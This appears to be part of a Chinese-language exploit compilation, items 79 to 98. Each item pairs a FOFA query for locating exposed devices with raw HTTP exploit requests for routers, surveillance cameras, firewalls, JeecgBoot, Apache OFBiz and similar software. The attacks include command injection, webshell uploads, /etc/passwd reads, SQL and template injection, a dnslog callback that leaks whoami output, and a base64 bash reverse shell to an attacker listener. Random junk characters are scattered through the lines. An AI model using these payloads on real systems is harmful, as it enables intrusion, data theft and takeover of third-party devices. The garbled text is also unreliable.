------YsOxWxSvj1KyZow1PTsh98fdu6l--
6 j; C$ w% T- D% |6 K/ Z
1 Q' I+ F: ^8 I- v9 @, ]- @: a8 ?) |4 Z4 @9 i: }' Y* D: C
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1! n: b$ g, F% b$ n4 O
Host: x.x.x.x
, s+ V F# z6 f2 S7 |
6 d# o( \- r4 S7 ?' H! J7 m& t1 C: h0 F W
79. BYTEVALUE 百为流控路由器远程命令执行
8 D0 q* r8 m$ E' S+ bFOFA:BYTEVALUE 智能流控路由器1 h* D- N- X! Z
GET /goform/webRead/open/?path=|id HTTP/1.1
* r; K9 Z% L3 @+ EHost:IP
, I4 M* m) R/ A2 p1 \3 p& u& y) EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.02 s: e& Y+ z B( B! |8 G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 i3 _7 m6 g4 d' ?1 {7 TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 ?& @1 X( c$ H2 y( k
Accept-Encoding: gzip, deflate) _4 g( K- |6 j% J7 C
Connection: close
4 r! F; ?) W0 W& J; v6 M/ [( vUpgrade-Insecure-Requests: 1
) ]2 n0 u7 y ~4 ]8 \& {% E6 t' v/ H( B1 u# M" |" q4 U* L$ s5 c- h8 z
* r) i, a" |$ p1 P, x
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
6 \1 X2 [5 v) s0 P+ P$ NFOFA:app="速达软件-公司产品"
; E9 J- _* [: ]$ h' s3 wPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
5 S0 s$ Q+ ^# _& ?" a4 S6 YHost: x.x.x.x b( n9 @- w; }3 t0 `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) m/ \' O$ _1 b1 g- N2 W8 N
Content-Length: 27
) E2 S/ p4 |, a3 d7 @" L, yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 a4 D0 l& a& e& f$ nAccept-Encoding: gzip, deflate/ ?& A+ `* P1 E1 ^3 L, L1 D! o( v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ d8 w2 _4 z( g. mConnection: close
# {& S* Y g! X1 g; {Content-Type: application/octet-stream$ y9 r0 p" j" }0 f! J- E, T
Upgrade-Insecure-Requests: 1, i3 d B( x; U ?! [1 E1 E
, A% z5 S- ?$ ^0 C; h( W5 G0 c( l<% out.print("oessqeonylzaf");%>1 _$ S: P3 Q8 |& C
% g$ d; J. p8 k7 c5 [6 ?; l% {
GET /xykqmfxpoas.jsp HTTP/1.14 Q/ ~+ O) S Z8 V" h
Host: x.x.x.x& e+ r2 S7 x1 ]; R r! e3 ^! N/ t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. o7 @! o; k: l+ y" t2 U1 ?Connection: close
4 m6 C+ M' n. n' n5 L+ g3 i2 [% EAccept-Encoding: gzip5 @$ G4 z5 ~! N5 A+ Z6 W
& x0 Y1 ]" i6 a% F: i; x* v. a
4 H* r- B: {- _1 j81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露# @; R5 D3 Q3 ]' S7 T( \& ?
FOFA:app="uniview-视频监控") V; o, d* a) i, m2 _' o( q
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
( S7 ~4 T5 H! P9 {) z0 B5 PHost: x.x.x.x! q" Q. M( D- e* v8 A W/ a8 P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: j+ }! M! Q5 O% x) \- S# o
Connection: close& e! D6 a2 r5 T- N( d
Accept-Encoding: gzip
( ]% H( S$ G0 |7 U8 N
/ E& l9 D4 f. ^: C- e8 @1 H+ O
; G0 L: ^: j: ?/ [% |0 A82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
% E' O+ c; Z9 UFOFA:app="思福迪-LOGBASE"7 l1 M' q5 m: ~2 T. j
POST /bhost/test_qrcode_b HTTP/1.1
9 m6 g' T; M- s5 @% AHost: BaseURL$ k; n N5 F/ x# [+ W3 Y
User-Agent: Go-http-client/1.19 p. a( S+ ?+ i4 U, q9 n4 T4 c5 I* T
Content-Length: 23
5 ]1 ~2 u! k+ f) CAccept-Encoding: gzip
5 _" J+ A% r# s$ |' S; k# I+ D7 bConnection: close8 q" \& ~5 h4 K7 ]
Content-Type: application/x-www-form-urlencoded5 K9 Y: w7 J( O3 o6 H5 L0 r8 ]0 Z3 E g: i
Referer: BaseURL
6 \) ~9 t# |) V3 _9 Z T5 g, a1 A# y% g& W. n& e: [
z1=1&z2="|id;"&z3=bhost
# r6 o" M6 u. d. `/ n; H
* _1 z" X2 D4 a+ r& F' v3 |& \+ r& W, T+ G: z" i+ h' c( L) h# X
83. JeecgBoot testConnection 远程命令执行% ?/ i* X( g0 M* @
FOFA:title=="JeecgBoot 企业级低代码平台"4 @: c. V2 ?* E9 ]; d! P8 s
& V) r. g) T9 y; q1 R
- G6 d2 k6 X& G7 w/ k" o2 uPOST /jmreport/testConnection HTTP/1.1
( c2 V- x5 x# D* bHost: x.x.x.x
4 b# q" `8 ^( d4 S7 ~0 \. vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- N" e9 k0 r% D2 b3 y! p7 g) \
Connection: close2 c' m/ f# b' M( m0 ~' f( r5 v+ {
Content-Length: 8881
7 Q1 [" z! U5 }$ M* P* vAccept-Encoding: gzip6 L; W/ r# [! ~. P* W
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
, m1 X; f2 H) ~% ^% lContent-Type: application/json
1 [$ O$ Y2 q- @$ X0 X( s. u a) ?, M3 t3 ~
PAYLOAD; _' Q1 N; |+ A
; d; X+ D2 ~- @4 n V t84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
* C: W& K4 M- H! L! H. L" UFOFA:title=="JeecgBoot 企业级低代码平台"
4 m& z- d4 b( k n z" B% o
& g' ~$ N4 J; o8 J7 e: J. Y i5 m5 a
p. U- Z2 o. e/ ?- gPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
' G) ]5 L# D( p0 s) j+ B$ i3 ^Host: 192.168.40.130:8080+ D- z4 |/ d* `8 ]4 S
User-Agent: curl/7.88.1
* _9 ?2 u& L: Y' h7 O1 `( a/ K, Z( Q* SContent-Length: 156
( Z! c4 {$ o: I/ H: GAccept: */*9 [: b4 N8 }; |1 a, R
Connection: close
9 {& t8 U/ \/ i+ s7 W" z3 |Content-Type: application/json
/ W- S# U J) D7 T% @' `# iAccept-Encoding: gzip4 |& p; ], P. D# m
/ }" d2 @/ u# A5 w- s& D5 q7 [{
% j: s0 ~. D* B2 \( j "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
" O I* R& b$ O "type": "0"
4 v4 r! w; C3 A9 Y4 P' K1 J) \9 W}+ Z% d8 u4 v z B8 I' B
4 Y# D; ]; ? f( m$ N9 k
5 b. u0 h/ a) e0 X5 X Z
85. SysAid On-premise< 23.3.36远程代码执行
- }' [% ]& M% g8 FCVE-2023-47246
& }) h' ^- X7 [FOFA:body="sysaid-logo-dark-green.png" : F1 h' R! S' [. z+ \, F
EXP数据包如下,注入哥斯拉马( I" N* q0 {! ?# s& Z8 E
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
' J5 e. v3 D) LHost: x.x.x.x
% [8 D: c7 @7 W, d$ X: I3 ^5 }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" U! C, x" q8 p G0 C6 ~# c
Content-Type: application/octet-stream
* o8 g. B6 m5 \1 F, x+ iAccept-Encoding: gzip1 P' N- S) z1 M& ]# g
. R, j! i0 L; v. D" [
PAYLOAD1 S0 b" L# h" A' J6 ~ r
9 H6 O. n) I+ O6 R* h% H& k2 \& [回显URL:http://x.x.x.x/userfiles/index.jsp5 M3 A. R- r" z" w
9 w# D9 h b6 ?+ m" I
86. 日本tosei自助洗衣机RCE8 U3 o9 `- e3 d* P8 y4 b6 ? y
FOFA:body="tosei_login_check.php"
" [4 |2 P: ~* M% k9 p9 I( tPOST /cgi-bin/network_test.php HTTP/1.1) Q' p9 R' s1 h, n& p7 n
Host: x.x.x.x
, C- n3 w& a8 F y H5 X6 o* i' fUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36) H% D9 e4 o' q; \+ ?
Connection: close
6 H7 y% m: ~7 s$ w X* n% I0 C1 _8 z) vContent-Length: 447 n4 y+ ]+ n- o2 I3 Z+ J) M1 x
Accept: */*: j7 |$ V, y- ~3 a) T4 B2 C5 O* `
Accept-Encoding: gzip
2 y1 k5 @1 }: TAccept-Language: en
. N5 U, g# {" eContent-Type: application/x-www-form-urlencoded
( |0 h' V4 ~! r2 N: O5 G
) P9 O8 Q1 C# x5 b# Jhost=%0acat${IFS}/etc/passwd%0a&command=ping7 J4 V; r* M) }' L, g7 ?
; S& K+ l! E+ V0 s6 e
- I8 A) G/ f2 s+ N87. 安恒明御安全网关aaa_local_web_preview文件上传( R2 @9 m+ p; S4 L/ h$ W' o
FOFA:title="明御安全网关"3 F1 @' z6 Z$ [! r1 h9 [& o
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.16 u( j7 L5 @# M" x! z+ Q) j
Host: X.X.X.X
" K9 X+ e8 |' T+ g; I8 Y" P* Q4 GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" X' T& C m/ {$ q- x) f# `/ ?
Connection: close
. y% y, Q/ v% [Content-Length: 198
3 f; D! F8 ?* H) W4 F( _Accept-Encoding: gzip
1 K5 w. H9 v# X' f9 }Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
* b: @: M' H4 _6 M; m) s
# R" Q, L; X: m* n2 ^) D0 y--qqobiandqgawlxodfiisporjwravxtvd
1 ^& t% g3 h# y' |. kContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"( @) ?& s# F p. w% w" `
Content-Type: text/plain) e; g& |& f3 A# c. r5 d* s
, c5 I6 T5 T& ]$ K% a
2ZqGNnsjzzU2GBBPyd8AIA7QlDq$ Q- B; ~. e- f/ Z# `! o4 Y$ e
--qqobiandqgawlxodfiisporjwravxtvd--) e6 }1 S9 P# b3 N
' v6 Z0 \4 F5 k0 Q: ~' b9 Q
) s) J' X; \7 [' ?, O/jfhatuwe.php
/ I+ f# T3 h6 w5 Y# O% d0 j1 C8 p" v/ i3 F3 U" x
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
: S0 ^; H3 O/ k( Y) ^7 E6 F0 jFOFA:title="明御安全网关"7 f8 x- s& y6 U9 c) Z$ l: h
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1" y8 [" s; T$ ?, p- I
Host: x.x.x.xx.x.x.x
+ i* u8 z _" B1 s' d% qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 M$ O4 h1 m* ~1 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& l3 \. E+ d! `9 ~1 UAccept-Encoding: gzip, deflate
6 T* p% `8 ]3 z0 P$ g% q7 gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 V2 g8 ?9 F, J' R- Y
Connection: close
8 u i/ S; j7 D+ ?, I8 ~0 {2 O5 O
/ w: O& O2 w* ~" [
. Q6 N6 U( B6 ~! V4 E7 U1 i6 R3 g/astdfkhl.php
" C. {6 L. n) `* q7 @2 O- T; p6 ~* J' Q) }
89. 致远互联FE协作办公平台editflow_manager存在sql注入/ C9 U2 j% k" `7 D$ _$ r* G4 s4 I' L
FOFA:title="FE协作办公平台" || body="li_plugins_download"
, W" U" d2 N& aPOST /sysform/003/editflow_manager.js%70 HTTP/1.13 d9 s. q X1 j
Host: x.x.x.x
" b1 r" I. @ c: A4 \- d dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% ] E* t9 k. |( j: v/ ~6 m; `! @9 SConnection: close3 x, e* {9 V* L6 ]
Content-Length: 41
! x- e7 e0 T8 i. m% uContent-Type: application/x-www-form-urlencoded
" x' C( K w- C k. CAccept-Encoding: gzip, k0 Y) R D3 X; P, t/ d
6 ~% @5 C$ |/ _4 H" Z" {4 l3 aoption=2&GUID=-1'+union+select+111*222--++ `5 j2 V! O; K0 W$ p; T
6 V9 G- f' b8 B5 \- j) ]/ l @5 }6 k3 q7 ` s* w+ ]
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
2 G- g$ O9 b# n' c- d; ]FOFA:icon_hash="-1830859634"
% l) w! c9 Y5 n% w' q( lPOST /php/ping.php HTTP/1.1
, V( [$ N5 Q2 U% c- M& `) u7 rHost: x.x.x.x
7 ]1 [! E4 v$ }8 h' xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
$ r( a! f: o( B8 N3 y1 UContent-Length: 51. S& z5 f7 v4 c' B% f
Accept: application/json, text/javascript, */*; q=0.01
+ [3 ]6 @" B" L! aAccept-Encoding: gzip, deflate4 I# q* {. D Q0 s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( w# L& {" N+ xConnection: close9 M$ B; M3 v o+ v$ Y3 m/ F& T
Content-Type: application/x-www-form-urlencoded
2 g3 u- r1 n/ B+ O$ M/ \X-Requested-With: XMLHttpRequest1 a+ P. ~! i [
# |9 Y1 N4 l X" M. J# g
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig) I; v0 k5 @9 Z: e3 N7 }6 E( S/ v
" E- S1 u- R$ U# b2 i
0 r# k+ V8 \& ~# G2 {, _( u
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
T2 _6 j- o: a4 F+ TFOFA:title="综合安防管理平台"( o1 ?3 X/ Y/ t0 `% @: C
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1! M0 \! a. G; }; y# s9 C) J. r" a6 v
Host: your-ip, ~& Q; x8 I# l# D& S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
% F+ F0 m$ d1 H' Z# P5 b0 tAccept-Encoding: gzip, deflate
+ m0 S1 ^) h1 O1 W3 e. q1 QAccept: */*
8 \* U* Z3 N6 i7 m% NConnection: keep-alive
3 E' \8 `' v3 V% H/ g5 l
7 q( {' g, L- j$ }9 E, c3 Z9 @% H9 j6 [
, ]+ M5 g4 a9 k; Y92. 海康威视运行管理中心session命令执行
6 ^* D% \/ u; GFastjson命令执行6 i( u% s; Q7 Y) I/ P5 H y# N
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
9 }: \7 |- b$ @+ qPOST /center/api/session HTTP/1.1
% I: i% k9 P8 \, g" Y, I' l. W0 e' XHost:
. L' Z1 H6 B- GAccept: application/json, text/plain, */*6 v. @) ~ Q% H' x
Accept-Encoding: gzip, deflate8 G2 S% L- _' U: A
X-Requested-With: XMLHttpRequest
i m( s8 H" Y# |3 ]Content-Type: application/json;charset=UTF-8( V C, N0 z" `# |
X-Language-Type: zh_CN" l' I3 |( ?' d9 ]6 w6 k" l$ T
Testcmd: echo test! Z0 z/ z1 U4 d3 Y& H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36& P( |8 s. [' s! h" E. }
Accept-Language: zh-CN,zh;q=0.9# [: w) @( o" {) M( ?" Z8 U3 A9 v
Content-Length: 5778
% K0 v0 C \" m5 N
- P* @1 k6 j) y4 a7 CPAYLOAD
( L8 }. @7 f6 l1 f3 n) @ w7 l) s! {* x; |9 h s
+ c3 \( I- E' w) f+ A& P9 `& ^5 v93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传9 s; j# [) i' l
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
+ f" @: t3 v) f$ BPOST /?g=app_av_import_save HTTP/1.1
9 B5 M' k( D# W, VHost: x.x.x.x) I3 ]5 t; V# P3 q( S: ~7 \5 a
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx2 j0 X! x6 O$ x4 ?+ S7 j% C
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ _4 c6 r( L1 u/ w( _. \- o) z# b! b0 `2 V0 @, ?/ n
------WebKitFormBoundarykcbkgdfx
+ B# D# x, f Y& y* m" wContent-Disposition: form-data; name="MAX_FILE_SIZE"
0 m1 c4 ]5 `; Y1 _$ f& L- c5 @0 m2 R4 O i- z
100000003 o! A0 Y) i! q" u/ _
------WebKitFormBoundarykcbkgdfx
) U6 ], u# `- _ ]Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt": g2 P: S; }# r' Y: Y
Content-Type: text/plain5 O! W0 q- b5 C4 w
( F! @" K" I. ?
wagletqrkwrddkthtulxsqrphulnknxa
3 Q/ s# u2 R% U7 n7 c------WebKitFormBoundarykcbkgdfx
2 z, B; q S# o" P6 q4 fContent-Disposition: form-data; name="submit_post"! Q% x2 m$ Q: W5 B2 x( ?3 m( C: z
+ q7 u8 H+ y( \3 m/ j2 g
obj_app_upfile
3 V1 f, N- F, w; ^/ c& {* n0 T# U------WebKitFormBoundarykcbkgdfx
! b' e, N* S' d2 dContent-Disposition: form-data; name="__hash__"3 S2 _; }9 e8 O b; z+ q9 c
$ ~1 R K4 q: w; \ q/ b6 r; l0b9d6b1ab7479ab69d9f71b05e0e94453 y0 K5 u3 Z) g8 E
------WebKitFormBoundarykcbkgdfx--
- v- E: d# G" n0 e: \$ X: a- a2 E0 c! B) s
# R5 X5 g- |% N% W/ B- Y! r
GET /attachements/xlskxknxa.txt HTTP/1.1 j3 d! M* h! G. ]; O( t: o
Host: xx.xx.xx.xx
; W5 }5 b2 s( K6 Z. K# U7 tUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' \4 ~* r/ q6 T& M8 W6 z
. D6 Z P. ]. r: Z; W5 f
, Y2 Q% Y6 `+ U& J) {) L! m94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
+ B" \' ?7 s$ n7 N# U* VFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
% O8 W6 V: W9 B* ^) H8 P" EPOST /?g=obj_area_import_save HTTP/1.14 b( P$ r6 a* j
Host: x.x.x.x9 Y. x f% }" z( h
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt6 L5 q8 B3 V- |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.368 ^7 M) r, h! s& V4 v2 r5 m( c
0 U+ o3 V: E3 S5 w) A* d/ o3 ?
------WebKitFormBoundarybqvzqvmt
b5 V* R6 }" K& L" J* J1 C, nContent-Disposition: form-data; name="MAX_FILE_SIZE"
/ ]: R7 M# C0 p2 Q: J! v1 ?1 Y+ \2 e! ?7 J1 F! n
10000000
+ Q; Y3 i" V5 P7 l------WebKitFormBoundarybqvzqvmt
% I- n/ b: r7 R1 WContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"4 `7 F" F4 k1 M9 \
Content-Type: text/plain* K, _8 O; r, |6 h6 ]
; o8 J2 E. @) l
pxplitttsrjnyoafavcajwkvhxindhmu
8 r- b; {8 W$ Q( U------WebKitFormBoundarybqvzqvmt
, _6 |, g( I' z2 [& Q+ bContent-Disposition: form-data; name="submit_post"& Y$ E* i" f- E; G
# R+ `! I2 V- W/ h3 B
obj_app_upfile- d: _5 c1 Y% v$ z6 N: L' P
------WebKitFormBoundarybqvzqvmt$ c6 c1 c9 a3 Q7 N
Content-Disposition: form-data; name="__hash__"
$ a, g) b/ z) ?3 |& b* S% S1 ]; l
0 i8 W$ }5 \. f0b9d6b1ab7479ab69d9f71b05e0e9445
% n& a5 s# A: C, |------WebKitFormBoundarybqvzqvmt--
6 Y4 I+ P" w( Q( R, P& |
" }/ X/ I, A* h2 V" _4 Q( w- B3 l3 i- Y; R* E% ]
: r. a9 z# G1 Q1 ?& z7 ]: b
GET /attachements/xlskxknxa.txt HTTP/1.16 S Y" m# I- s: [- V
Host: xx.xx.xx.xx
2 V# ~( G6 b+ N$ f' d* MUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.363 G3 t* z+ c7 {+ D6 t* V( o
! x4 Y, p* X- x9 C' x# Z
- ~0 l2 o! {# }! b+ ]
7 E' K) d, B- C' A+ e9 Z95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
6 G- g7 |+ m/ U- D1 J, iCVE-2023-49070
: [/ _# P% ~4 n) R9 pFOFA:app="Apache_OFBiz"
6 O0 m+ i" Z( i- @+ w) sPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
+ k' U6 _5 }! a% z# G- c% b/ aHost: x.x.x.x
$ m8 l/ B: G! y) \User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36- N5 G8 b. J+ W5 e# I D
Connection: close4 o3 i' n# ` Y* O% c# |7 V
Content-Length: 889' J% {; g$ \* t7 K! X
Content-Type: application/xml
7 ~3 a7 I P o& x+ PAccept-Encoding: gzip8 h& |( o2 q9 {( o7 P$ Y
" N2 c" ]' l. a<?xml version="1.0"?>
$ t* J# q* N. u6 N! }<methodCall>
* a( i0 q1 P( H; R( f <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
: t- n( [- }! a% f <params>4 t& {7 t! z5 R: d: `
<param>4 i: M" y% k! ^, W- Y' L) p' f
<value>+ f! }) p5 H6 W* j8 \
<struct>, W- s$ T/ u6 h! R8 ~) g, M
<member>
6 `/ Y4 `- i2 u+ I8 A <name>test</name>
6 Y+ I* n1 t, g( m& X$ ^+ d <value>
. E5 |2 T2 ~, I2 E" ~ <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>0 G6 D. m3 q+ m3 g- ^9 T1 N6 ^3 b+ i# X
</value>
$ ?% }8 C9 h p; ~ </member>
+ s3 W% D: C7 k0 C2 k4 U& w9 `5 ]2 S </struct>8 F. z) {' V: y$ k0 i( w% {
</value>! }# @; ^2 H* ~4 e8 h
</param>) A- u0 k) f, G' M6 C# Z0 F! L
</params>! O, [' `7 C& s
</methodCall>" B: B; G6 p, P" T9 M. D) k6 C
! j' _0 ?$ C& |( n% P, ?
8 b. d' [4 P7 d) [用ysoserial生成payload, z* Z6 V/ n9 u' {2 @% x: N7 Z3 D
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"* o( z- N6 t2 C% }1 ?; v1 X1 a+ ~
' y/ n1 `* V4 j: q
! |/ Q1 Z; A& Q1 {将生成的payload替换到上面的POC8 V: L9 b5 E: U9 ?8 c
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
1 L7 D: r2 e% t& ^6 ?1 i0 LHost: 192.168.40.130:8443
H6 n0 b$ S9 B3 o: s$ r2 CUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36# ]! O/ t. P# ]$ C& \. }' M
Connection: close
; W2 l/ [5 t& ~* w; KContent-Length: 889! S- X8 l5 F; Y$ r) e
Content-Type: application/xml
; m5 r- o- k3 b, e! @% N1 G1 B3 ?Accept-Encoding: gzip
" Q1 r+ d* H6 n S4 R8 q" ?' Z% a& C5 C5 h* P0 k- D
PAYLOAD
! T: o* o/ z1 K- E7 Z) D7 N
& s5 V9 N( e6 V$ w R96. Apache OFBiz 18.12.11 groovy 远程代码执行
# r$ o% W& {1 K% r9 t$ mFOFA:app="Apache_OFBiz"/ z- A* P% U+ E0 T# ~# b
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
6 t/ e3 j. {: e S; _$ LHost: localhost:8443
+ r# W6 m A0 v7 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0' K8 P" ?/ }4 c% V" A
Accept: */*0 \$ I; \+ e% ~8 \5 I/ P# [- s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 A5 ]. W6 Q( i, ~5 C
Content-Type: application/x-www-form-urlencoded- d! x% K6 b4 r7 |1 i# T, s
Content-Length: 55
( {' U& W% H8 _7 }" j4 N
4 S* F T8 _1 h' `4 |! y0 hgroovyProgram=throw+new+Exception('id'.execute().text);9 i" d+ T0 G/ A2 p$ x8 s
8 B4 N" a) a6 H9 [+ X- [0 T8 J3 r1 @
反弹shell8 w0 L) u$ Q; {1 [5 e- n
在kali上启动一个监听) G G9 r5 t5 ]/ _1 A
nc -lvp 7777
% u, f* x! a! Y" h& R1 Q+ q) B2 Y3 ~' [
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1- U" j; T1 v- I
Host: 192.168.40.130:8443
, \: n1 R2 q4 f; B# h7 ]1 F( MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0' j* A' x5 U& X+ K
Accept: */*
' J' Y" I4 p7 ?2 j& m( WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- s3 m! f. D8 @$ U$ L/ GContent-Type: application/x-www-form-urlencoded$ b$ u/ I& \2 `/ `) b6 R
Content-Length: 71, V& Q. V% }0 x# E( l# p3 [
: F% P5 P( Z* {3 ]
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
9 F7 L4 B' Z5 z; s6 f/ ~/ B S
/ x5 y! R& z9 @& t; `97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行9 J2 J! y+ u% Z
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"" @+ e. \' T! Q- o
GET /passport/login/ HTTP/1.13 x( }, p- S4 n% Z P
Host: 192.168.40.130:8085
8 `$ j/ ^' \9 h0 g c0 @3 T; @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ d/ }6 Z) {$ b/ o. ~. N/ |4 m- _; V
Accept-Encoding: gzip
$ u3 g( z( T5 w! @2 BConnection: close% U9 }5 }* M+ c
Cookie: rememberMe=PAYLOAD
I% J( f6 ~5 \ g9 jX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
5 k& O# @$ [! x, {$ R q* A) n/ Q$ b. V' N; I
$ \2 b3 j/ }0 T# w' `" p0 i- e98. SpiderFlow爬虫平台远程命令执行
4 T8 h2 O8 _0 Y s8 N8 `1 K6 k1 aCVE-2024-0195
( P# w+ `- q8 N+ }' j1 F W# V3 l7 OFOFA:app="SpiderFlow"
: q: Q1 ?6 F# [POST /function/save HTTP/1.19 p. L% f' x" y9 ]
Host: 192.168.40.130:8088. N$ ^7 y# l3 ]0 g9 v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
3 H Y5 O' R5 x# w/ n, p+ DConnection: close
